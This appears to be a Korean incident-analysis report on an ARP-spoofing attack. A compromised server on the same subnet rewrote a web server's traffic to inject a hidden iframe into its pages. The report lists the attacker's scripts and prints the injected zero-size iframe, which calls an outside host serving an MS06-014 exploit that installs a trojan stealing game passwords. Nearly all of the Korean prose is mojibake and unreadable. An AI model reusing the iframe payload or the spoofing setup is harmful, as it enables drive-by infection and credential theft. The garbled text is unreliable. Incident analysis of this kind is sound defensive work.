ARP Spoofing ±â¹ýÀ» ÀÌ¿ëÇÑ À¥ ÆäÀÌÁö ¾Ç¼ºÄÚµå »ðÀÔ »ç·Ê
1. °³¿ä
ÀÎÅÍ³Ý Ä§ÇØ»ç°í Áß ÀüÅëÀûÀÎ À¥ º¯Á¶ ÇàÀ§´Â, »çÀÌÆ® ÃʱâÆäÀÌÁö¸¦ °ø°ÝÀÚ°¡ ¿øÇÏ´Â ¸Þ½ÃÁö·Î ¹Ù²Ù¾î, ½Ç·ÂÀ» °ú½ÃÇϰųª Á¤Ä¡ÀûÀÎ Àǹ̸¦ Àü´ÞÇÏ°íÀÚ ¿´´Ù. ÇÏÁö¸¸ ÃÖ±Ù ´ëºÎºÐÀÇ °æ¿ì¿¡¼ ´Â ´«¿¡ ¶çÁö ¾Êµµ·Ï ¾Ç¼ºÄڵ带 ¼û°ÜµÎ¾î ¹æ¹®ÀÚÀÇ ÄÄÇ»ÅÍ¿¡ ¾Ç¼ºÇÁ·Î±×·¥À» ¼³Ä¡ÇÏ°í ±¸µ¿½ÃÅ° ´Â ¾ç»óÀ¸·Î ¹ßÀüÇÏ°í ÀÖ´Ù[1]. ÀÌ·¯ÇÑ ¾Ç¼º ÄÚµåÀÇ ÀüÆĸ¦ ÅëÇØ, À¥ º¯Á¶ ħÇØ»ç°íÀÇ ¹üÀ§¸¦ ÀÏ¹Ý »ç¿ëÀÚµéÀÇ PC±îÁö È®´ë½ÃŲ ´ëÇ¥ÀûÀÎ ÀÌÀ¯´Â, PC »ç¿ëÀÚÀÇ °èÁ¤ Á¤º¸ ¶Ç´Â °³ÀÎÁ¤º¸¸¦ Å»ÃëÇÏ °Å³ª ¼öÁýÇÏ¿© ¾Ç¿ëÇÔÀ¸·Î½á, ±ÝÀüÀûÀÎ ÀÌÀÍÀ» ¾ò±â À§ÇÔÀÌ´Ù. ±×·¯¹Ç·Î ¿øÇÏ´Â Á¤º¸ÀÇ ¼öÁýÀ» ±Ø´ëÈÇϱâ À§Çؼ ¾Ç¼ºÄÚµåµéÀÇ ¼ö¸íÀ» Àå±â°£ Áö¼Ó½ÃÅ°°í, ¸¹Àº ¼öÀÇ PC¿¡ ħÅõÇØ¾ß Çϱ⠶§¹®¿¡ ´õ¿í´õ Á¤±³ÇÑ ¹æ¹ýÀ¸·Î ÀÌ·ç¾îÁö°í ÀÖ´Ù. µû¶ó¼ À¥ º¯Á¶»ç°í¿¡ ´ëÇØ °ü¸®ÀÚµéÀÌ Å½ÁöÇϰųª Á¶Ä¡ÇϱⰡ ´õ¿í ´õ ¾î·Á¿öÁö°í ÀÖ´Â ½ÇÁ¤ÀÌ´Ù.
Áö±Ý±îÁö ¹ß°ßµÈ ¾Ç¼ºÄÚµå »ðÀÔÀÇ ´ëÇ¥ÀûÀÎ ´ë»óÀ¸·Î´Â À¥»çÀÌÆ® ¼Ò½ºÆÄÀÏ, Á¢¼ÓÀÚ Ãø ½ºÅ©¸³Æ®(ÀÚ¹Ù ½ºÅ©¸³Æ®, ºñÁÖ¾óº£ÀÌÁ÷ ½ºÅ©¸³Æ® µî), CSS ¶Ç´Â .incµîÀÇ ÂüÁ¶ÆÄÀÏ, Ç÷¡½ÃÆÄÀÏÀÇ ¾×¼Ç½ºÅ©¸³Æ®, µ¥ÀÌÅͺ£À̽º ÀÚ·á °ª µîÀÌ ÀÖ´Ù. ÇÏÁö¸¸ ÀÌ·¯ÇÑ °æ¿ì´Â ´ëºÎºÐ À¥ ¼¹ö ³»ºÎÀÇ Ä§ÇØ»ç°í À̹ǷÎ, ¿øÀκм®À̳ª º¸¿Ï Á¶Ä¡ µîÀÌ ÇØ´ç ¼¹ö ³»¿¡¼¸¸ ÀÌ·ç¾î Á³¾úÁö¸¸, º» »ç°íÀÇ °æ¿ì¿¡´Â ³×Æ®¿öÅ©»óÀÇ Æ®·¡ÇÈÀ» Å»Ãë/º¯Á¶ÇÏ¿© ¾Ç¼º iframe Äڵ带 »ðÀÔÇÏ¿´À¸¹Ç·Î, Áö±Ý±îÁöÀÇ ¾Ç¼ºÄÚµå »ðÀÔ »ç·Êµé°ú´Â ´Ù¸¥ Ư¡À» Áö´Ï°í ÀÖÀ¸¸ç, ´ÙÀ½°ú °°ÀÌ ¿ä¾àÇÒ ¼ö ÀÖ´Ù.
o ´ë»ó À¥¼¹ö¿¡ ħÅõÇÏÁö ¾Ê°í, µ¿ÀÏÇÑ ¼ºê³×Æ®¿öÅ©ÀÇ Ãë¾à ½Ã½ºÅÛ ¾Ç¿ë o µ¿ÀÏÇÑ ¼ºê³×Æ®¿öÅ©¿¡¼ µ¿Àû ARP cache¸¦ ¿î¿ëÁßÀÎ ¸ðµç ¼¹öÀÇ Æ®·¡ÇÈ º¯Á¶ °¡´É o ARP Spoofing[2] ±â¹ýÀ» ¼öµ¿ÀûÀÎ ½º´ÏÇο¡¼ ±×Ä¡Áö ¾Ê°í Æ®·¡ÇÈ º¯Á¶¿¡ ¾Ç¿ë o ¾Ç¼ºÄÚµå »ðÀÔ °ü·Ã ħÇØ»ç°í ºÐ¼® ½Ã ¼¹ö´ÜÀ§¿¡¼ ³×Æ®¿öÅ© ´ÜÀ§·Î ºÐ¼® ¹üÀ§ÀÇ È®Àå ÇÊ¿ä
Áï, <±×¸² 1.>°ú °°ÀÌ ARP Spoofing ±â¹ýÀ» ÅëÇØ °ø°ÝÀÚÀÇ ¼¹ö°¡ °ÔÀÌÆ®¿þÀÌÀÎ °ÍÀ¸·Î À§ÀåÇÏ¿© ¿ÜºÎ·Î ³ª°¡´Â Æ®·¡ÇÈÀ» °¡·Îä°í º¯Á¶ÇÏ¿´±â ¶§¹®¿¡, ÇÇÇØ ½Ã½ºÅÛ»Ó¸¸ ¾Æ´Ï¶ó ³×Æ®¿öÅ© ȯ°æ¿¡¼ÀÇ ÀÌ»óÀ¯¹«µµ ÇÔ²² È®ÀÎÇØ¾ß ÇÑ´Ù.
<±×¸² 1. ħÇØ»ç°í °³¿äµµ>
ÃÖÁ¾ ºÐ¼® °á°ú ARP SpoofingÀ» ¼öÇàÇß´ø ¼¹ö´Â °°Àº ¼ºê³×Æ®¿öÅ©ÀÇ À©µµ¿ìÁî 2000 ¼¹ö¿´À¸¸ç, ÀÌ ¼¹ö ¶ÇÇÑ °ø°ÝÀÚ°¡ ħÅõÇÑ ÈÄ¿¡ ARP Spoofing ÇÁ·Î±×·¥À» ¼³Ä¡ÇÏ¿© µ¿ÀÛ½ÃŲ ÇÇÇؼ¹öÁßÀÇ Çϳª¿´´Ù. ÀÌ·¯ÇÑ Ä§ÇØ»ç°í ºÐ¼® °á°ú¿¡ µû¶ó, À¥ ¼¹öÀÇ ARP cache¿¡¼ °ÔÀÌÆ®¿þÀÌ MACÁÖ¼Ò¸¦ Á¤Àû (permanent)À¸·Î ¼³Á¤ÇÏ°í, À©µµ¿ìÁî ½Ã½ºÅÛ¿¡¼ ARP Spoofing ÇÁ·Î±×·¥À» Á¾·á½ÃÅ°°í ³ª¼¾ß, ±×µ¿¾È À¥ ÆäÀÌÁö¿¡ »ðÀԵǾú´ø ¾Ç¼ºÄڵ尡 »ç¶óÁö°Ô µÇ¾ú´Ù.
±×¸®°í ¾Ç¼ºÇÁ·Î±×·¥À» À¯Æ÷ÇÑ »çÀÌÆ®ÀÇ ºÐ¼®°á°ú, 1,000 ¿©°³ÀÇ ´Ù¸¥ À¥»çÀÌÆ®¸¦ ÇØÅ·ÇÑ ÈÄ À¯Æ÷Áö ¼¹ö·Î ÀÚµ¿ Á¢¼Ó Çϵµ·Ï ¾Ç¿ëÇÏ¿´À¸¸ç, 62¸¸ ¿©°³ÀÇ Unique IP°¡ ¾Ç¼ºÇÁ·Î±×·¥ ´Ù¿î·Îµå ÆäÀÌÁö¸¦ ¹æ¹®ÇÏ°í, ÀÌ Áß º¸¾È Ãë¾àÁ¡ÀÌ ÀÖ´Â 9¸¸ 2õ¿© ´ëÀÇ PC°¡ °¨¿° µÈ ´ë±Ô¸ð ¾Ç¼ºÄÚµå À¯Æ÷ »ç·Ê¿´´Ù. ÀÌ¿¡ µû¶ó, ÀÎÅͳÝħÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ¿¡¼´Â ¹ß°ßµÈ 1,000 ¿©°³ÀÇ °æÀ¯Áö »çÀÌÆ®ÀÇ ¸ñ·ÏÀ» È®º¸ÇÏ¿© ´ã´çÀÚ¿¡°Ô ÇØ´ç »ç½ÇÀ» Å뺸ÇÏ°í º¸¿Ï Á¶Ä¡Çϵµ·Ï ÇÏ¿´´Ù.
2. ¾Ç¼ºÄÚµå °æÀ¯Áö À¥»çÀÌÆ® ºÐ¼®
ºÐ¼® ´ë»ó ¼¹ö´Â ÈÞ´ëÀüÈ °ÔÀÓ°ü·Ã »çÀÌÆ®¿´À¸¸ç ¿î¿ëȯ°æÀº ´ÙÀ½°ú °°´Ù.
o ³×Æ®¿öÅ© ȯ°æ: ºÎ»ê ¸ð Åë½ÅÞäÀÇ IDC ¼¹öÈ£½ºÆà o ½Ã½ºÅÛ ¿ëµµ: À¥ ¼¹ö o ¿î¿µÃ¼Á¦: LINUX (CentOS 3.6) - À¥ ¼¹ö: Apache 1.3.34, PHP 4.4.1 - ±âŸ ¼ºñ½º : MySQL
±×¸®°í ÀÌ ¼¹ö¿¡ ÀÎÅÍ³Ý ºê¶ó¿ìÀú·Î Á¢¼ÓÇÏ°Ô µÇ¸é, <±×¸² 2.>¿Í °°ÀÌ ¸ðµç HTMLÆäÀÌÁö¿¡ ¾Ç¼º ÇÁ·Î±×·¥ ¼³Ä¡¸¦ À¯µµÇÏ´Â iframe Äڵ尡 ¾Æ·¡¿Í °°ÀÌ »ðÀԵǾî ÀÖ¾ú´Ù.
<±×¸² 2. Á¢¼ÓÀÚ ºê¶ó¿ìÀú¿¡¼ ¼ö½ÅÇÑ À¥ ÆäÀÌÁö>
ÀÌ ¿Ü¿¡µµ, ÇÇÇØ ¼¹ö¿¡¼ ³ªÅ¸³ª´ø ÀÌ»ó Áõ»óÀº ´ÙÀ½°ú °°¾Ò´Ù.
o HTMLÆäÀÌÁö°¡ ½ÃÀ۵Ǵ ºÎºÐÀÎ <title>ÅÂ±× ºÎ±Ù¿¡ iframe»ðÀÔ o HTTP ¶Ç´Â SSH¿¬°áÀÇ Á¢¼Ó Áö¿¬ ¹× Á¢¼Ó Àå¾Ö o OSÀ缳ġ¸¦ À§ÇØ »õ·Î¿î OS¿Í ¹°¸®ÀûÀ¸·Î ´Ù¸¥ ¼¹ö·Î ÀÌÀüÇÏ¿´À½¿¡µµ µ¿ÀÏÇÏ°Ô ¹ß»ý o ¾Ç¼ºÄڵ尡 »ðÀԵǴ Çö»óÀÌ Áö¼ÓµÇÁö ¾Ê°í ÀϽÃÀûÀ¸·Î ¹ß»ý
ºÐ¼® Ãʱ⿡´Â ħÇØ»ç°í ºÐ¼®ÀýÂ÷¿¡ µû¶ó °¢Á¾ ·Î±× ºÐ¼®°ú ½Ã½ºÅÛ ºÐ¼®À» Àå±â°£ ÁøÇàÇÏ¿´À¸³ª ¿øÀÎÀ» ãÁö ¸øÇÏ¿´´Ù. ½Ã½ºÅÛ ºÐ¼® °á°ú ¿øÀÎÀ» ãÁö ¸øÇ߱⠶§¹®¿¡, ³×Æ®¿öÅ© Æ®·¡ÇÈÀ» °üÂû ÇÏ¿´À¸¸ç, ÇØ´ç ¼¹ö¿¡¼ ¹ß¼ÛµÇ´Â Æ®·¡ÇÈ°ú À¥ Á¢¼ÓÀÚÀÇ ºê¶ó¿ìÀú¿¡¼ÀÇ ³»¿ëÀÌ »óÀÌÇÔÀ» ¹ß°ßÇÏ¿´´Ù. ¾Æ·¡ÀÇ <±×¸² 3.>Àº À¥ ¼¹ö¿¡¼ Á¢¼ÓÀÚ¿¡°Ô º¸³»´Â tcpdump°á°úÀ̸ç, Àü¼ÛµÇ´Â ³»¿ë¿¡´Â ¾Ç¼ºÄڵ尡 ¾ø´Â »óÅÂÀÌÁö¸¸, Á¢¼ÓÀÚ¿¡°Ô´Â <±×¸² 4.>¿Í °°ÀÌ iframeÀ» ÀÌ¿ëÇÑ ¾Ç¼ºÄڵ尡 »ðÀÔµÈ Ã¤·Î ¼ö½ÅµÇ¾ú´Ù.
<±×¸² 3. À¥ ¼¹ö¿¡¼ Á¢¼ÓÀÚ¿¡°Ô Àü¼ÛÇÑ HTML ÄÚµå>
<±×¸² 4. Á¢¼ÓÀÚ¿¡°Ô ¼ö½ÅµÈ HTML ÄÚµå>
±×·¯¹Ç·Î À¥¼¹ö¿Í Á¢¼ÓÀÚ°£ÀÇ Åë½Å±¸°£¿¡¼ ¹®Á¦°¡ ÀÖÀ» °ÍÀ¸·Î ÃßÁ¤ÇÏ°í, ARP Spoofing ¿©ºÎ¸¦ È®ÀÎÇÏ¿´´Ù. ÇØ´ç ¼¹ö°¡ ÀÔÁÖÇØ ÀÖ´Â IDCÃø¿¡ ¹®ÀÇÇÑ °á°ú À¥¼¹ö ARP cache »óÀÇ °ÔÀÌÆ®¿þÀÌ MAC°ú ½ÇÁ¦ °ÔÀÌÆ®¿þÀÌ MACÀÌ ´Ù¸¥ °ÍÀ» È®ÀÎÇÏ¿´À¸¸ç, °ÔÀÌÆ®¿þÀÌ·Î À§ÀåÇÏ°í Æ®·¡ÇÈÀ» º¯Á¶ÇÏ°í ÀÖ´Â ¼¹ö¸¦ ã¾Æ¼ Ãß°¡ ºÐ¼®À» ÁøÇàÇÏ¿´´Ù.
3. Æ®·¡ÇÈ º¯Á¶ ¼¹ö ºÐ¼®
À¥¼¹ö¿Í °ÔÀÌÆ®¿þÀÌ¿¡ À§Àå ARPÆÐŶÀ» º¸³»¾î Æ®·¡ÇÈÀ» º¯Á¶ÇÑ ¼¹öÀÇ ¿î¿ëȯ°æÀº ´ÙÀ½°ú °°´Ù.
o ¿î¿ëȯ°æ: ºÎ»ê ¸ð Åë½ÅÞäÀÇ IDC ¼¹öÈ£½ºÆà o ½Ã½ºÅÛ ¿ëµµ: À¥ È£½ºÆà ¹× Å×½ºÆ® ¼¹ö o ¿î¿µÃ¼Á¦: WINDOWS 2000 Server Std. (SP4) - À¥ ¼¹ö: IIS 5.0 - ±âŸ ¼ºñ½º : MS-SQL 2000
ÀÌ ¼¹ö´Â À¥¼¹ö¿Í µ¿ÀÏÇÑ ¼ºê³×Æ®¿öÅ© ¾È¿¡¼ À¥È£½ºÆà ¼¹ö·Î ¾²À̸é¼, ȨÆäÀÌÁö °³¹ß Å×½ºÆ®¿ëÀ¸·Îµµ ¾²ÀÌ°í ÀÖ¾ú´Ù. ½Ã½ºÅÛ ºÐ¼®À» À§ÇØ µ¿ÀÛÇÏ°í ÀÖ´Â ÇÁ·Î¼¼½ºµéÀ» »ìÆ캸¾ÒÀ¸³ª, ARP Spoofing°ú °ü·ÃµÈ ÇÁ·Î¼¼½º´Â ¹ß°ßÇÏÁö ¸øÇߴµ¥, ³ªÁß¿¡ ¹àÇôÁø °á°ú °ø°ÝÀÚ°¡ ½ºÅ©¸³Æ®¸¦ ÀÌ¿ëÇÏ¿© °ü¸®ÀÚÀÇ ·Î±×ÀÎÀ» ŽÁöÇÏ¿© ÇØ´ç ÇÁ·Î¼¼½º¸¦ ÁßÁö½ÃÄױ⠶§¹®À̾ú´Ù. ħÇØ»ç°í ºÐ¼®À» À§ÇØ °ø°ÝÀÚÀÇ ÆÄÀÏÀ» È®º¸ÇÏ°íÀÚ À¥ Ãë¾àÁ¡ÀÌ ÀÖ´ÂÁö È®ÀÎÇÏ¿´À¸¸ç, Ãë¾àÇÑ À¥ »çÀÌÆ®ÀÇ µð·ºÅ丮¸¦ Á¡°Ë ÇÑ °á°ú °ø°ÝÀÚ°¡ »ý¼ºÇØ µÐ ÆÄÀϵéÀ» ãÀ» ¼ö ÀÖ¾ú´Ù. À¥ »çÀÌÆ®ÀÇ Ä§ÇØ»ç°í¸¦ ºÐ¼®Çϱâ À§ÇØ À¥·Î±×¸¦ ã¾Æº¸¾ÒÀ¸³ª, ¼¹öÀÇ HDD ¿ë·®¹®Á¦ ¶§¹®¿¡ ·Î±×¸¦ ³²±âÁö ¾Êµµ·Ï ¿î¿µÇØ ¿Ô±â ¶§¹®¿¡ À¥·Î±× ºÐ¼®Àº ÇÒ ¼ö ¾ø¾ú´Ù.
<±×¸² 5. IIS À¥·Î±× ¼³Á¤È¸é>
°¡. ARP Spoofing°ü·Ã ÇÁ·Î±×·¥ ºÐ¼®
À¥ µð·ºÅ丮¿¡ ³²°ÜÁø ÆÄÀÏÀº server.asp ÆÄÀÏÀ̾úÀ¸¸ç, ARP SpoofingÀ» ±¸µ¿½ÃÅ°´Â ¿ªÇÒÀ» ÇÏ´Â ÆÄÀÏÀ̾ú´Ù. ±×¸®°í ARP Spoofing¿¡ ÇÊ¿äÇÑ ÆÄÀϵéÀº c:\winnt\addins\ µð·ºÅ丮¿¡¼ ¹ß°ßÇÒ ¼ö ÀÖ¾úÀ¸¸ç, °¢ ÆÄÀϵéÀÇ ¿ªÇÒÀ» ºÐ¼®ÇØ º¸¸é ´ÙÀ½°ú °°´Ù.
o C:\webhome\board\server.asp: ¿ÜºÎ¿¡¼ HTTP¸¦ ÀÌ¿ëÇÏ¿© ARP Spoofing ÇÁ·Î±×·¥À» ±¸µ¿ ½ÃÅ°±â À§ÇÑ ½ºÅ©¸³Æ® ÆÄÀÏÀ» ½ÇÇà
<±×¸² 6. server.asp>
o C:\winnt\addins\a.vbs: ARP SpoofingÀ» ¼öÇàÇÏ´Â ÇÁ·Î±×·¥(ppppt.exe)¿¡ ÀÎÀÚ°ªµéÀ» Àü´ÞÇÏ¿© ½ÇÇà
<±×¸² 7. a.vbs>
o C:\winnt\addins\a.bat: a.vbs¿Í µ¿ÀÏÇÑ ¿ªÇÒÀ» ¼öÇàÇÏÁö¸¸ ¹èÄ¡ÆÄÀÏ ÇüÅ·Πµ¿ÀÛÇÏ°í, ppppt.exe ÇÁ·Î¼¼½º¸¦ °Á¦·Î ÁßÁö(kill)½ÃÅ°°Ô µÇ¸é ping ¸í·ÉÀ¸·Î ¾à 20¿© ºÐ°£ Áö¿¬½ÃŲ ÈÄ ´Ù½Ã ppppt.exe ½ÇÇà½ÃÅ°±â ¶§¹®¿¡, °ü¸®ÀÚ°¡ ÇÁ·Î¼¼½º¸¦ °è¼ÓÇؼ ¸ð´ÏÅ͸µ ÇÏÁö ¾ÊÀ¸ ¸é ppppt.exe ÇÁ·Î¼¼½ºÀÇ Àç½ÃÀÛÀ» ¾Ë±â ¾î·Á¿ò
<±×¸² 8. a.bat>
o C:\winnt\addins\go.bat: °ü¸®ÀÚ ±×·ìÀÇ °èÁ¤ÀÌ ·Î±×ÀÎ ÇÏ°Ô µÇ¸é ·Î±×¿ÀÇÁÇÏ¸é¼ ppppt.exe ÇÁ·Î¼¼½º Á¾·á
<±×¸² 9. go.bat>
o C:\winnt\addins\job.txt: ARP spoofingÇÏ´Â µ¿¾È ¼ö½ÅµÇ´Â Æ®·¡ÇÈ Áß¿¡¼ ÁöÁ¤ÇÑ Çü½ÄÀÇ ÆÐŶÀÌ ¼ö½ÅµÇ¸é job.txtÆÄÀÏÀÇ ¹®ÀÚ¿ ±ÔÄ¢¿¡ µû¶ó ´ëüÇÏ¿© º¯Á¶Çϱâ À§ÇÑ ÂüÁ¶ÆÄÀÏÀ̸ç 2 ÇàÀº °Ë»ö Á¶°ÇÀÌ°í 4¿Àº ´ëüÇÒ ¹®ÀÚ¿À̹ǷÎ, Æ®·¡ÇÈÁß¿¡ <title À̶ó´Â ¹®ÀÚ¿ÀÌ °Ë»öµÇ¸é iframeÄڵ带 »ðÀÔÇÔ
<±×¸² 10. job.txt>
³ª. ARP Spoofing ÇÁ·Î±×·¥ ºÐ¼®
½ÇÁ¦·Î ÀÌ ¼¹ö¿¡¼ ARP SpoofingÀ» ¼öÇàÇÑ ÇÁ·Î±×·¥ ÆÄÀϸíÀº ppppt.exeÀ̸ç, UPX[3]·Î ½ÇÇà ¾ÐÃàµÈ »óÅ¿´´Ù. ½ÇÇà¾ÐÃà ÇØÁ¦ ÈÄ <±×¸² 11.>°ú °°ÀÌ ¹ÙÀ̳ʸ®¸¦ ºÐ¼®ÇÑ °á°ú ARP spoofing¿ëÀ¸·Î Á¦ÀÛµÈ °ø°³ ¼Ò½º¸¦ ÀÌ¿ëÇÑ °ÍÀ¸·Î È®ÀεǾú´Ù.
<±×¸² 11. ppppt.exeÆÄÀÏÀÇ strings>
º» ºÐ¼®¿¡¼ÀÇ ³×Æ®¿öÅ© ȯ°æÀº °³¿ä¿¡¼ ¼³¸íÇÑ <±×¸² 1.>°ú °°ÀÌ °ÔÀÌÆ®¿þÀÌ IP´Â 210.X.X.129, À¥¼¹ö IP´Â 210.X.X.139, Æ®·¡ÇÈ º¯Á¶ ¼¹ö IP´Â 210.X.X.222ÀÌ´Ù. Âü°í·Î, Windows XP¿¡¼´Â raw socketÀ» ÅëÇÑ Æ®·¡ÇÈ¿¡ Á¦ÇÑÀ» ¹Þ±â ¶§¹®¿¡ ÆÐŶ º¯Á¶¿¡ Á¦¾àÀÌ ÀÖ´Ù.
¡à À§Àå ARP Àü¼Û ´Ü°è ARP Spoofing ÇÁ·Î±×·¥À» ½ÇÇàÇϸé, <±×¸² 12.>¿Í °°ÀÌ Ãâ·ÂµÇ¸é¼ Æ®·¡ÇÈ º¯Á¶¸¦ À§ÇÑ ¸ð´ÏÅ͸µÀ» ½ÃÀÛÇÑ´Ù.
<±×¸² 12. ppppt.exe ÇÁ·Î±×·¥ ½ÇÇà>
±×¸®°í <±×¸² 13.>À» º¸¸é ¾Ë ¼ö ÀÖµíÀÌ, °ÔÀÌÆ®¿þÀÌ¿Í À¥ ¼¹ö ¾çÂÊ¿¡ MAC°ú IPÁÖ¼Ò¸¦ À§Àå ÇÏ´Â ARP ÆÐŶÀ» º¸³»¸é, µ¿ÀûÀÎ ARP cache¸¦ »ç¿ëÇÏ´Â ½Ã½ºÅÛ¿¡¼´Â ¼ö½ÅµÈ ARP ÆÐŶÀÇ Á¤º¸¸¦ ¹Þ¾Æµé¿© <±×¸² 14.>¿Í °°ÀÌ ARP cache¸¦ °»½ÅÇÏ°Ô µÇ¸ç, Æ®·¡ÇÈ º¯Á¶ ¼¹ö´Â À¥ ¼¹öÀÇ ARP cache¸¦ À¯Áö[4]½ÃÅ°±â À§ÇØ Áö¼ÓÀûÀ¸·Î ARP ÆÐŶÀ» º¸³½´Ù.
<±×¸² 13. º¯Á¶¼¹ö¿¡¼ À§Àå ARP Àü¼Û>
À§ÀåµÈ ARPÆÐŶÀ» ¼ö½ÅÇÑ À¥ ¼¹ö¿¡¼´Â ¾Æ·¡ÀÇ ±×¸²°ú °°ÀÌ ARP cache¸¦ °»½Å ÇÏ°Ô µÇ¾î ½ÇÁ¦ÀÇ °ÔÀÌÆ®¿þÀÌ·Î º¸³»¾ßÇÒ Æ®·¡ÇÈÀ» º¯Á¶ ¼¹ö·Î º¸³»°Ô µÈ´Ù.
<±×¸² 14. À§Àå ARP ¼ö½Å ÈÄ º¯°æµÈ ARP cache>
¡à Æ®·¡ÇÈ º¯Á¶ ´Ü°è
À§Àå ARP¸¦ Àü¼ÛÇÑ ÈÄ ÀÎÀԵǴ Ʈ·¡ÇÈÀ» °üÂûÇÏ¿©, ÁöÁ¤ÇÑ Çü½ÄÀÇ ÆÐŶÀ̸é, ¾Æ·¡ <±×¸² 15.>ÀÇ job.txtÆÄÀÏÀ» ÂüÁ¶ÇÏ¿© ÁöÁ¤ÇÑ ¹®ÀÚ¿·Î ´ëü(replace)ÇÏ¿© Àü¼Û ÇÑ´Ù.
<±×¸² 15. ¹®ÀÚ¿ ´ëü ±ÔÄ¢ Á¤ÀÇ ÆÄÀÏ>
¾Æ·¡ÀÇ <±×¸² 16.>À» »ìÆ캸¸é À¥ ¼¹ö¿¡¼ Àü¼ÛÇÑ ÆÐŶ¿¡´Â iframeÀÌ ¾øÁö¸¸, <±×¸² 17.>°ú °°ÀÌ º¯Á¶ ¼¹ö¿¡¼ º¯Á¶ÇÑ ÈÄ <±×¸² 18.>°ú °°ÀÌ Àü¼ÛÇÏ°Ô µÇ¸é Á¢¼ÓÀÚ¿¡°Ô´Â <±×¸² 19.>¿Í °°ÀÌ º¯Á¶µÈ ÆäÀÌÁö°¡ ¼ö½ÅµÈ´Ù.
<±×¸² 16. À¥¼¹ö¿¡¼ Á¢¼ÓÀÚ¿¡°Ô Àü¼ÛµÇ´Â Æ®·¡ÇÈÀ» º¯Á¶¼¹ö°¡ ¼ö½Å>
<±×¸² 17. º¯Á¶¼¹ö¿¡¼ Æ®·¡ÇÈ º¯Á¶>
<±×¸² 18. º¯Á¶ÇÑ ³»¿ëÀ¸·Î º¯Á¶¼¹ö°¡ À¥ Á¢¼ÓÀÚ¿¡°Ô Àü¼Û>
<±×¸² 19. À¥ Á¢¼ÓÀÚÀÇ ºê¶ó¿ìÀú·Î ¼ö½ÅµÈ º¯Á¶ ÆäÀÌÁö>
Áö±Ý±îÁöÀÇ °úÁ¤À» °ÅÄ£ ÈÄ, ºê¶ó¿ìÀú¿¡¼´Â iframe¿¡ Á¤ÀǵǾî ÀÖ´Â ÆäÀÌÁö¿¡ Á¢¼ÓÀ» ½ÃµµÇÏ°Ô µÈ´Ù.
<iframe src=http://dreamxxx.com/img/jang/music.htm height=0 width=0></iframe>
4. ¾Ç¼ºÄÚµå À¯Æ÷Áö À¥»çÀÌÆ® ºÐ¼®
º» Àå¿¡¼´Â ¾Ç¼ºÄÚµå À¯Æ÷Áö·Î »ç¿ëµÈ ¼¹öÀÇ ºÐ¼® °á°ú¸¦ »ìÆ캸µµ·Ï ÇÑ´Ù. ¾Ç¼ºÄÚµå À¯Æ÷Áö·Î »ç¿ëµÈ ¼¹ö´Â FreeBSD »ó¿¡¼ Apache À¥¼¹ö(¹öÀü 1.3.34)¸¦ »ç¿ëÇÏ°í ÀÖ¾ú´Ù. Áö±Ý±îÁöÀÇ ¾Ç¼ºÄÚµå À¯Æ÷Áö/°æÀ¯Áö »çÀÌÆ®µéÀº ´ëºÎºÐ À©µµ¿ìÁî OS¿Í IIS À¥¼¹ö¸¦ ÁÖ °ø°Ý ´ë»ó À¸·Î ÇÏ¿´´Âµ¥, º» »ç·ÊÀÇ °æ¿ì FreeBSD OS¿Í Apache À¥¼¹ö¸¦ °ø°ÝÇÏ¿´´Ù. ´ÙÀ½ ±×¸²Àº ¾Ç¼ºÇÁ·Î±×·¥ À¯Æ÷¼¹öÀÇ ´ë·«ÀûÀÎ ½Ã³ª¸®¿ÀÀÌ´Ù.
<±×¸² 20. ¾Ç¼ºÄÚµå À¯Æ÷ ½Ã³ª¸®¿À>
°¡. ¾Ç¼ºÄÚµå °æÀ¯Áö »çÀÌÆ®¿¡¼ À¯Æ÷ »çÀÌÆ®·Î Á¢¼Ó À¯µµ ¾Æ·¡¿Í °°ÀÌ ´Ù¼öÀÇ ¾Ç¼ºÄÚµå °æÀ¯Áö »çÀÌÆ®¿¡ º» »ç°íºÐ¼®À» ÁøÇàÇÑ ¾Ç¼ºÄÚµå À¯Æ÷ »çÀÌÆ®·Î Á¢¼ÓÇϵµ·Ï iframeÀ» Àº´ÐÇÏ¿´´Ù.
ÀϹݻç¿ëÀÚ°¡ °æÀ¯Áö »çÀÌÆ®¸¦ ¹æ¹®ÇÒ °æ¿ì À§ÀÇ Àº´ÐµÈ ºÎºÐÀ¸·Î ÀÎÇØ ÀÚµ¿À¸·Î dreamxxx.com »çÀÌÆ®·Î Á¢¼ÓµÇ°í PCÀÇ º¸¾ÈÃë¾àÁ¡(MS06-014)À» °ø°ÝÇÏ´Â music.htm¿¡ ÀÇÇØ º¸¾È ÆÐÄ¡°¡ µÇ¾î ÀÖÁö ¾ÊÀº PC¿¡ cctv.exe ¶ó´Â ÆÄÀÏÀÌ ½ÇÇàµÇ¾î ¿Â¶óÀΰÔÀÓ ID¿Í Æнº¿öµå¸¦ À¯Ãâ½ÃÅ°´Â Æ®·ÎÀ̸ñ¸¶¸¦ ¼³Ä¡ÇÑ´Ù.
³ª. ÇÇÇØ ±Ô¸ð
¡à 1,000¿© °³ÀÇ °æÀ¯Áö À¥»çÀÌÆ® ¹ß°ß
ÇØ´ç À¯Æ÷ »çÀÌÆ®¿¡¼´Â À¥·Î±×¿¡ ¡°referer¡±¸¦ ³²±âµµ·Ï ¼³Á¤µÇ¾î ÀÖ¾ú´Ù. referer´Â ÇØ´ç ÆäÀÌÁö¸¦ ¿äûÇÑ ÀÌÀü URLÀ» ÀǹÌÇÏ´Â °ÍÀ¸·Î ÀϹÝÀûÀ¸·Î ¾î¶² °æ·Î¸¦ ÅëÇØ ÀÚ»çÀÇ À¥»çÀÌÆ®¸¦ ¹æ¹®Çß´ÂÁö È®ÀÎÇϱâ À§ÇÑ ¸ñÀûÀ¸·Î ³²±â´Â °æ¿ì°¡ ¸¹´Ù. Áï, ÀÚ»ç »çÀÌÆ®°¡ ¾î¶² °Ë»ö ¼ºñ½º¸¦ ÅëÇØ Á¢¼ÓÇß´ÂÁö È®ÀÎÇÏ¿© »çÀÌÆ® È«º¸¿¡ È°¿ëÇϱâ À§ÇÑ ¿ëµµ·Î ¸¹ÀÌ »ç¿ëµÈ´Ù. º» »ç°íÀÇ À¯Æ÷Áö »çÀÌÆ®¿¡¼´Â ¾Æ·¡¿Í °°ÀÌ referer¸¦ °°ÀÌ ³²±âµµ·Ï ¼³Á¤µÇ¾î ÀÖ¾î À̸¦ ÅëÇÑ °æÀ¯Áö »çÀÌÆ®¸¦ ã´Âµ¥ ¸¹Àº µµ¿òÀÌ µÇ¾ú´Ù. ÀϹÝÀûÀÎ °æ¿ì, 